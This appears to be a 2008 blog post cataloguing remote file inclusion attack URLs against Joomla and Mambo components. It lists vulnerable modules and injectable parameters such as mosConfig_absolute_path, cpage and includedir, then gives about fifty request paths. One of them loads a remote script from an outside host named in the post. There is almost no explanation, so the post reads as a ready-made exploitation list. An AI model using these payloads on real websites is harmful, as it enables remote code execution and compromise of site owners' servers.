Found vuln mosConfig_absolute_path injection 03-04-08

Script Name :
AutoStand (Joomla module)
Carousel Flash Image Gallery (Joomla module)
Coppermine Photo Gallery component (Mambo module)
CropImage (Mambo module)
ExtCalendar (Mambo module)
FlatMenu (Mambo module)
JoomlaPack (Joomla module)
MOSMedia Lite (Mambo module)
MyCalendar
NFN Address Book (Mambo module)
swMenuFree (Mambo module)
TaskHopper (Joomla module)
Tour De France Pool (Joomla module)
VisoHotlink
WebCalendar
zOOm Media Gallery
?

Parameters used for code injection attempts:
cpage=
go=
highlight=
includedir=
j=
mosConfig_absolute_path=
setup[use_category]=

script injection:

http://claroline.lct-net.cl/id?


Url requested:
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_kochsuite&_REQUEST%5bItemid%5d=1&
GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lmo&_REQUEST%5bItemid%5d=1&GLOBAL
S=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_lurm_constructor&_REQUEST%5bItemi
d%5d=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_mambatstaff&_REQUEST%5bItemid%5d=
1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_mgm&_REQUEST%5bItemid%5d=1&GLOBAL
S=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_pollxt&_REQUEST%5bItemid%5d=1&GLO
BALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_typedcontent&_REQUEST%5bItemid%5d
=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_hashcash&_REQUEST[Itemid]=1&GLOBALS=&
mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_htmlarea3_xtd-c&_REQUEST[Itemid]=1&GL
OBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_jcs&_REQUEST[Itemid]=1&GLOBALS=&mosCo
nfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_jd-wiki&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_jooml&_REQUEST[Itemid]=1&GLOBALS=&mos
Config_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_joomla_flash_uploader&_REQUEST[Itemid
]=1&GLOBALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_joomlaradiov5&_REQUEST[Itemid]=1&GLOB
ALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mos
Config_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_madeira&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_mambots&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_mp3_allopass&_REQUEST[Itemid]=1&GLOBA
LS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_pcchess&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_pccookbook&_REQUEST[Itemid]=1&GLOBALS
=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid]=1&GLOBALS
=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_performs&_REQUEST[Itemid]=1&GLOBALS=&
mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_phpshop&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_pollxt&_REQUEST[Itemid]=1&GLOBALS=&mo
sConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_rwcards&_REQUEST[Itemid]=1&GLOBALS=&m
osConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_securityimages&_REQUEST[Itemid]=1&GLO
BALS=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_serverstat&_REQUEST[Itemid]=1&GLOBALS
=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?_REQUEST=&_REQUEST[option]=com_swmenupro&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=v
iewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highli
ght=
--------------------------------------------------------------------------------------------
//index.php?option=com_alphacontent&section=6&cat=15&task=view&id=&mosConfig_abs
olute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_extended_registration&Itemid=&mosConfig_absolute_path=htt
p://claroline.lct-net.cl/id?
--------------------------------------------------------------------------------------------
//index.php?option=com_fireboard&Itemid=27&func=view&catid=2&id=43//?option=com_
babackup&task=view&id=27&Itemid=39//?option=com_babackup=&sectionid=&id=&mosConf
ig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_juser&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
//index.php?option=com_typedcontent&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
/germancrawler//include/print_category.php?setup[use_category]=
--------------------------------------------------------------------------------------------
/index.php?_REQUEST=&_REQUEST[option]=com_admin&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=
--------------------------------------------------------------------------------------------
/index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBAL
S=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
/index.php?go=
--------------------------------------------------------------------------------------------
/index.php?j=
--------------------------------------------------------------------------------------------
/index.php?option=com_contentt&page=shop.browse&category_id=&keyword=&manufactur
er_id=&Itemid=&mosConfig_absolute_path=
--------------------------------------------------------------------------------------------
/index.php?option=com_facileforms&cpage=
--------------------------------------------------------------------------------------------
/index.php?option=com_flyspray&cpage=
--------------------------------------------------------------------------------------------
/index.php?option=com_hashcash&cpage=
--------------------------------------------------------------------------------------------
/turkishcrawler//include/print_category.php?setup[use_category]=
--------------------------------------------------------------------------------------------
/user-list/english/detailed/listing961.html//tools/send_reminders.php?noSet=0&in
cludedir=
Found vuln mosConfig_absolute_path injection 03-04-08 Found vuln mosConfig_absolute_path injection 03-04-08 Reviewed by Furkan Samadha on 10:14 PM Rating: 5